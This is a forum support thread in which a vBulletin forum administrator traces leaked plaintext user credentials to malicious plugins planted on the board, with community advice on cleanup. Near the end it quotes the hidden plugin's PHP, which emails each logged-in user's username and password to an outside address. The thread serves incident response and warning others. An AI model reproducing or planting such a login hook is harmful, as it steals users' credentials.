hello please can you help me to solve this problem ,i found many emails queued on my server when i stopped postfix ,the emails contains username and correct password of many logged in users , i cleaned many files , but the emails still sending ,i don't know where is the script and how to stop it plz help

Disable your products and contact vB support.

i disabled all products and cleaned all garbage ,still the same problem

ps ax | more

check what processes are running, anything typical like ./name kill it, find the scripts on the server and remove them, my guess is your already to late anyways and your server is probably compromised, i would shut the forum down as well as kill apache/php, as well as postfix.

upgrade your server backend as well.

arent the passwords encrypted? Theyre not stored in their native text anywhere, even in the database

@tnc, that is true, but that is changable.

yes the passwords and the username are clear not encrypted , here is an exemple

From www-data@host.xxxxx.com (www-data)
To xxxxxx@windowslive.com
Date Fri, 6 Nov 2009 20:02:49 +0100 (CET)
Subject Victim

username: username
Password: clear password



########

i found a fil in avatars named avatar662.php and the code is crypted there

and other fil on the attachments ,but not sure if it's

here is the text

-- the 'correct' password
real_password = "password";

-- prompt the user to enter a password
user_password = Dialog.PasswordInput("Password", "Please enter the password: ", MB_ICONQUESTION);

-- compare the user's password to the 'correct' password.
-- If the user supplies the wrong password, exit the program.
if real_password ~= user_password then
Application.Exit();
end

what mods do you have installed?

i removed all mods ,still the same problem where is the script sending that !!

what were the mods. The fact you removed them means nothing if thats how they got in.

Could it be that this script somehow gives an extra login prompt (fake) and that your users are actually entering their info in there?

Save all your files and database.

Disable and remove (all files!!) all modifications

Disable all your styles and create a new style with no parent (= default style) and set this to be the only style to be used on your board.

Check for modified files using AdminCP -> Maintenance -> Suspect file

Contact vBulletin support for assistence.

This happened on a vB board I'm a member of a few weeks ago. The server was compromised and a harvesting script that prompted usernames and passwords to be entered was planted on the homepage.

These were logged to a txt file and later published online with everyones usernames and passwords.

The amount of times a member tried to login was how many times they appeared on the list in the txt file.

This is the reason why your username/passwords are in plain text format. They remain encrypted in the database.

Get in touch with your host and shut down everything. When your back up make every user change there password.

found and solved ,


here is what i found on some plugins !
just a mod but tell me plz if this

this are the plugins added !

member_complete
vb-sec2 login_verify_success
vb-sec3 global_setup_complete
vb-sec4 misc_start

and this is the content of the vb-sec2

$message = "username: " . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "\nPassword:". $vbulletin->db->escape_string(htmlspecialchars_uni($password));
mail('XXXXX@windowslive.com', 'Victim', $message);

found and solved ,


here is what i found on some plugins !
just a mod but tell me plz if this

this are the plugins added !

We'd still like to know which mod did this. Please check in Plugin Manager... above those files listed above, there should be a Product: name.

Write down the product name, then go into Manage Products and find that product on the list.

If the product's name is underlined, then it's clickable. Hover your mouse over that name, right-click, and select Copy Shortcut. Then come back here and paste the link. This will tell us if the product was released on vb.org, or if it came from somewhere else.

If the product's name is not underlined, then copy and paste the name, version, and description into your reply here.

If the product's name does not show on Manage Products, then return to Plugin Manager and screenshot the listings, and post your screenshots as a reply here. Maybe someone else is familiar with the product and can identify it.

It is very important that you let us know which modification did this. vb.org can pull the mod, check the code, and if vb.org sees the code that you have posted above they can notify other forums who have downloaded the mod, warning them not to use it.

The above script can only sent out real passwords if your config.php file is set to sent plain text passwords to the server. On a default installation plain text passwords are hashed on the client side and never even sent to the server. It is strongly recommended, the proof is in this thread, not to allow unhashed passwords to be sent to the server.